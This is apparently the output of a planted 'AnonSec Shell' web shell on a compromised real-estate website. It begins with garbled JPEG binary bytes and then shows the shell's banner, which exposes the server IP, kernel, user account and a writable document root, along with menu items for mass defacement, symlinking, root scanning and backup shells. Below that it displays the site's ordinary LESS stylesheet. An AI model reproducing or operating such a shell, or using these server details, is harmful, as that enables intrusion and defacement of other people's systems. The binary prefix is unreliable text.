JFIFHHCnxxdC"&!1A2Q"aqBb1 ?R{~,.Y|@sl_޸s[+6ϵG};?2Y`&9LP?3rj  "@V]:3T-G*P ( *(@AEY]qqqALn+Wtu?)lQUT*Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ηnu ڶh%(Lvũbb-?M֍݌٥IHln㏷L(69L^"6Pd&1H&8@TUTCJ%eʹFTj4i5=0g J&Wc+3kU@PS@HH33M *"Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePPd\A2glo=WL(6^;k"ucoH"b ,PDVlvL_/:̗rN\mdcw T-O$w+FZ5T *Y~l:99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~YИ3M3@E)GTg%AnpPMUҀhԳW c֦iZ ffR 7qMcyAZTc0bZU k+oG<]APQTA={PDti@c>>KÚ"qL.1Pk6QY7t.k7o<P &yַܼJZyWz{UrS@~P)Y:A"]Y&ScVO%17 6l4i4YR5ruk*ؼdZͨZZ cLakb3N6æ\1`XTloTuTAA 7Uq@2ŬzoʼnБRͪ&8}:e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt"(.=Y:V#'H:δ4#6yjѥBB ;WD-ElFf67*\AmADQ__'2$TX9nu'm@iPDTqS`%u%3[nY, :g = tiXH]ij"+6Z* .~|05s6 ,ǡogm+KtE-BF ES@(UJxM~8%g/=Vw[Vh3lJT rK -kˎYٰ,ukͱٵf sXDP]p]&MS95O+j&f6m463@t8ЕX=6}HR5ٶ06/@嚵*6  "hP@eVDiYQT`7tLf4c?m//B4 lajL} :Eb#PHQb,yN`rkAb^ |}s4XB4*,@[{Ru+%le2}`,kI$U`>OMuhP% ʵ/ L\5aɕVN1R63}ZLj-Dl@*(K\^i@F@551k㫖hQ沬#h XV +;]6zOsFpiX$OQ )ųl4YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 162.19.86.63  /  Your IP : 216.73.217.81   [ Reverse IP ]
Web Server : Apache
System : Linux oirealestate.net 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : oinversion ( 10001)
PHP Version : 5.6.40
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/oinversion.com/httpdocs/frontend/web/assets/ce95ab48/less/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/oinversion.com/httpdocs/frontend/web/assets/ce95ab48/less/home.less
.home(){

    .top-header{
        background-color: #3F4A9A;
        height: 30px;
        
        .languages{
            padding: 3px 12px 0;
            background-color: #E1E1E1;
            height: 30px;
            a{
                color: #3F4A9A;
                text-decoration: none;
                padding: 0 3px;
            }
        }
        
        .blog{
            padding: 3px 15px 0;
            height: 30px;
            background-color: #9EEBF3;
            color: #3F4A9A;
            text-decoration: none;
            img{
                margin-right: 5px;
            }
        }
    }
    
        .header{
                border-bottom: 1px solid #e6e6e6;
                @media (max-width: 767px) {
                    padding: 0;
                }

                .container{
                    @media (max-width: 767px) {
                        padding: 0;

                        .row{
                            margin: 0;
                        }

                        .logo-list{
                            padding-left: 20px;
                            width: 75%;
                            
                        }

                        .navbar-resp{
                            padding-right: 20px;
                        }
                        
                    }   
                    
                    a{
                        &:hover{
                            background-color: transparent;
                        }
                        .logo-header{
                            margin-top: 15px;
                            max-width: 170px;
                        }
                    }
                    
                    .navbar-nav{
                        a{
                            &:hover{
                                background-color: #f7f7f7;
                            }
                        }
                    }
                }

                .header-container{
                        min-height: 80px;				

                        .logo{
                                min-height: 70px;
                                padding: 12px 0;

                                img{
                                        min-height: 40px;
                                        margin-top: 5px;
                                }
                        }

                        .logo-icon{
                                text-align: center;
                        margin-top: 30px;

                        @media (max-width: 500px) {
                                display: none;
                            }
                }

                        ul li{ 

                                a{
                                        color: #262626;
                                        font-size: 14px;
                                        padding: 10px 20px;

                                        @media (max-width: 1150px) {
                                        padding: 15px 10px;
                                        font-size: 12px;
                                }

                                }

                                a:hover{
                                        background-color: #f9ce1b;
                                }

                        } 

                        .socials {
                            .socials-body {
                              margin: 8px 20px 0;
                            }

                            @media (max-width: 767px) {
                                display: none;
                            }
                            a {
                              margin-right: 10px;
                              &:last-child {
                                margin-right: 0;
                              }
                            }
                            img {
                                  width: 25px;
                            }
                              }

                          /* todo: rename login-links because they are not login links */
                          .login-links {
                            margin-top: 25px;
                            ul {
                              li{

                                  a.contact{
                                      padding: 10px 20px;
                                      background-color: #f9ce1b;
                                      color: #262626;
                                      &:hover {
                                        background-color: #3eacc5;
                                        color: #fff;
                                      }
                                  }

                                  a.b2e{
                                      padding: 10px 20px;
                                      background-color: #fff;
                                      border: 2px solid #f9ce1b;
                                      color: #262626;
                                      text-transform: uppercase;
                                      font-family: 'Open Sans';
                                      font-weight: bold;
                                      &:hover {
                                        background-color: #f9ce1b;
                                        color: #262626;
                                      }
                                      @media (max-width: 480px) {
                                          padding: 10px;
                                      }
                                  }
                              }
                            }
                          }

                        .blog-title{
                                text-align: center;
                                margin-top: 25px;
                                color: #ee1c4f;
                                font-family: 'montserrat-regular';
                        }

                        .navbar-resp{
                                text-align: right;
                                display: none;

                                @media (max-width: 768px) {
                                display: block;
                            }

                            i{
                                margin-top: 22px;
                                color: #3eacc5;
                                font-size: 40px;
                            }

                            i:hover{
                                color: #d2d2d2;
                            }
                        }

                        .non-resp-menu{
                                margin-top: 20px;
                                @media (max-width: 768px) {
                                display: none;
                            }
                        }

        @media (max-width: 768px) {
          .resp-menu-blog-container {
            display: none;
          }
        }

                        .resp-menu-blog{

            @media (max-width: 768px) {
              margin-right: 10px;
              margin-top: 15px;
            }
                                a{
                                        text-align: center;
                                }
                        }
                }
        }

        #sidr{
                display: none;
                /*overflow: visible !important;*/
                /*margin-top: 52px !important;*/

                ul{
                        padding: 0;
                        list-style-type: none;
                        margin-bottom: 0;

                        li{
                                background-color: #3eacc5;
                                padding: 10px 15px;

                                a{
                                        display: block;
                                        text-decoration: none;
                                        color: #ededed;
                                        text-transform: uppercase;
                                        font-size: 16px;
                                }
                        }

                        #lets-talk{
                                border-bottom: 1px solid white;
                        }
                }
        }


	.site-index{		

            .top-banner-index{
                background: #fff url('../img/header-home.jpg') no-repeat center 0; 
                background-size: cover;
                min-height: 550px;
                border-bottom: 1px solid #818181;
                padding: 0;

                h1{
                    padding-top: 220px;
                    font-size: 54px;
                    margin: 0;
                    color: white;
                    font-family: 'opensans-light'; 
                    @media (max-width: 1199px) {
                            font-size: 44px;
                    }

                    @media (max-width: 991px) {
                        font-size: 34px;
                    }

                    @media (max-width: 767px) {
                            font-size: 48px;
                            padding-top: 40px;
                            text-align: center;
                    }

                    .blue{
                        color: #6dcad9;
                    }
                }

                    .form-wrapper{
                        position: relative;
                        min-height: 550px;
                        .form{
                            padding: 20px;
                            position: absolute;
                            bottom:0;
                            right: 15px;
                            width:100%;
                            background-color: rgba(41,63,112,0.8);
                            border-top: 10px solid #00e7fb;

                            @media (max-width: 767px) {
                                right: 0;
                            }

                            input{
                                border-color: #6dcad9 !important;
                                color: white;
                            }
                            ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
                                color: white;
                            }
                              ::-moz-placeholder { /* Firefox 19+ */
                                color: white;
                            }
                              :-ms-input-placeholder { /* IE 10+ */
                                color: white;
                            }
                              :-moz-placeholder { /* Firefox 18- */
                                color: white;
                            }
                            h3{
                                color: white;
                                text-align: center;
                                font-size: 26px;
                                padding-bottom: 10px;
                                @media (max-width: 1199px) {
                                    font-size: 21px;
                                }
                            }

                            .subtitle{
                                color: white;
                                font-size: 16px;
                                margin-bottom: 20px;
                                font-family: 'opensans-light';
                            }
                            
                            .button-secondary{
                                margin-top: 15px;

                            }

                            .help-block-error{
                                margin: 0;
                            }

                            .terms{
                                color: white;
                            }
                        }
                    }

                    .top-content{
                            max-width: 1200px;

                            .top{
                                    padding: 80px 0;
                                    color: white;
                                    font-size: 32px;
                                    line-height: 1.2;
                                    text-align: center;
                                    text-transform: uppercase;

                                    @media (max-width: 991px) {
                                            padding: 50px 0;
                                            font-size: 26px;
                                    }

                                    @media (max-width: 767px) {
                                    padding: 50px 0 15px;
                                    font-size: 20px;
                                }

                                @media (max-width: 700px) {
                                    padding-top: 45px;
                                }

                                @media (max-width: 520px) {
                                    padding: 30px 0 15px;
                                    font-size: 14px;
                                }

                                @media (max-width: 400px) {
                                    padding: 15px 0 15px;
                                    font-size: 12px;
                                }

                                hr{
                                            text-align: center;
                                            width: 70px;
                                            border: 4px solid #f9ce1b;
                                            margin: 55px auto;
                                            @media (max-width: 767px) {
                                                    margin: 30px auto;
                                            }
                                    }

                                    h4{
                                            font-family: 'montserrat-light';
                                            text-transform: none;
                                            margin-bottom: 64px;
                                            line-height: 1.4;
                                            margin-top: 0;
                                            @media (max-width: 767px) {
                                                    margin-bottom: 30px;
                                                    font-size: 14px;
                                            }
                                    }

                                    a{
                                            img{
                                                    @media (max-width: 767px) {
                                                            margin-bottom: 30px;
                                                    }
                                            }
                                    }
                            }
                    }
		}
                
                .main-index{
                    padding-bottom: 60px;
                    
                    .top-main-index{
                        padding-top:30px;
                        .i-logo{
                            display: block;
                            margin: 0 auto;
                        }

                        h2{
                            margin: 0;
                            padding-top:60px;
                            padding-bottom:60px;
                            text-align: center;
                            color: #3f4a9a;
                            font-size: 38px;
                            font-family: 'opensans-light';
                        }
                        
                        img{
                            max-width: 100%;
                        }

                        .handshake{
                            display: block;
                            margin: 0 auto;
                        }

                        .main-text{
                            width: 80%;
                            margin: 60px auto 0;
                            font-size: 24px;
                            color: #3e4b5b;
                            text-align: center;
                            font-family: 'opensans-light';

                            @media (max-width: 767px) {
                                width: 90%;
                                font-size: 18px;
                            }
                        }
                    }
                }
                
                .control-panel{
                    padding-top: 60px;
                    border-top: 1px solid #f0f0f0;
                    text-align: center;
                    .phone{
                        width:100%;
                    }
                    h3{
                        color: #3f4a9a;
                        font-size: 36px;
                        padding-bottom: 40px;
                        margin: 0;
                        font-family: 'opensans-light';
                    }

                    p{
                        font-size: 16px;
                        color: #3e4b5b;
                        max-width: 590px;
                        margin: 0 auto 40px;
                        font-family: 'opensans-light';

                        a{
                            color: #2d79f1;
                            text-decoration: none;
                            font-family: 'opensans';
                        }
                    }
                    
                    .items{
                        padding-top: 120px;
                        @media (max-width: 767px) {
                            padding-top: 0;
                            .right, .left{
                                text-align: center !important;
                            }
                        }

                    }
                    
                    .offers{
                        font-family: 'opensans';
                        font-size: 20px;
                    }
                }
	}
    
    .cookies-text {
    	margin-top: 80px;
        max-width: 700px;
        margin-left: auto;
        margin-right: auto;
    	img{
    		margin: 0 auto;
    		max-width: 100%;
    		display: block;
    	}
		h4{
			color: #ed2952;
            margin-top: 2em;
		}

		p{
			font-family: 'Open Sans';
		}

		.bold{
			font-weight: bold;
		}

		li {
		  	list-style: none;
		}
		li:before {
			content: '\2022';
		    display: block;
		    position: relative;
		    max-width: 0;
		    max-height: 0;
		    left: -13px;
		    top: -9px;
		    color: #ed2952;
		    font-size: 25px;
		}
	}

}

.footer(){
    .footer{
        background: #fff url('../img/fondo_footer.jpg') no-repeat center 0; 
        background-size: cover;
        border-top: 3px solid #00e7fb;
        .container{
            padding-top: 30px;
            padding-bottom: 50px;
            
            .footer-item{
                @media (max-width: 767px) {
                    padding-bottom: 30px;
                    text-align: center;
                }
                
                .recent-block{
                    img{
                        border-bottom: 7px solid #00E6FB;
                        margin-bottom: 5px;
                    }
                    a{
                        color: #9EEBF3;	
                        font-family: "avenir-next";	
                        font-size: 17px;
                    }
                }
                
                .socials{
                    a > img{
                        margin-right: 10px;
                        margin-bottom: 10px;
                    }
                }
            }
            
            .footer-item.first{
                img{
                    max-width: 130px;
                    display: block;
                    margin-bottom: 15px;
                    @media (max-width: 767px) {
                        margin: 0 auto 15px;
                    }
                }
                
                ul{
                    display: block;
                }
            }
            
            .button-secondary{
                border-color: #00e7fb;
                color: #00e7fb;
                margin-top: 15px;
                &:hover{
                    background-color: #00e7fb;
                    color: white;
                }
            }
            
            input{
                background-color: transparent;
                border: none;
                border-radius: 0;
                box-shadow: none;
                border-bottom: 1px solid #00e7fb;
                padding: 10px 0;
                width: 100%;
                font-size: 14px;
                font-family: 'opensans-light';
            }
            
            .help-block-error{
                color: #00e7fb;
            }
            
            ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
                color: #00e7fb;
            }
              ::-moz-placeholder { /* Firefox 19+ */
                color: #00e7fb;
            }
              :-ms-input-placeholder { /* IE 10+ */
                color: #00e7fb;
            }
              :-moz-placeholder { /* Firefox 18- */
                color: #00e7fb;
            }
            
            ul{
                padding-left: 0;
                list-style-type: none;
                margin-bottom: 0;
                li{
                    display:block;
                    
                    a{
                        font-size: 12px;
                        color: white;
                        text-decoration: none;
                        &:hover{
                            background-color: transparent !important;
                        }
                    }
                }
            }
            
            p{
                font-size: 12px;
                color: white;
                line-height: 18px;
            }
            
            .terms{
                a{
                   color: #00e7fb;
                }
            }
            
            h4{
                color: #00e7fb;
                font-size:16px;
                margin-bottom: 20px;
            }
        }
        
        .copyright{
            background-color: #3f4a9a;
            border-bottom: 1px solid white;
            
            .container{
                padding-top: 30px;
                padding-bottom: 30px;
            }
            p,a,span{
                font-size: 12px;
                color: white;
                line-height: 18px;
                vertical-align: super;
                padding: 0 5px;
                text-decoration: none;
                margin-bottom: 0;
                
                @media (max-width: 767px) {
                    display: block;
                    margin: 0 auto 10px;
                    width: 100%;
                    text-align: center;
                }
            }
        }
    }
}


Anon7 - 2022
AnonSec Team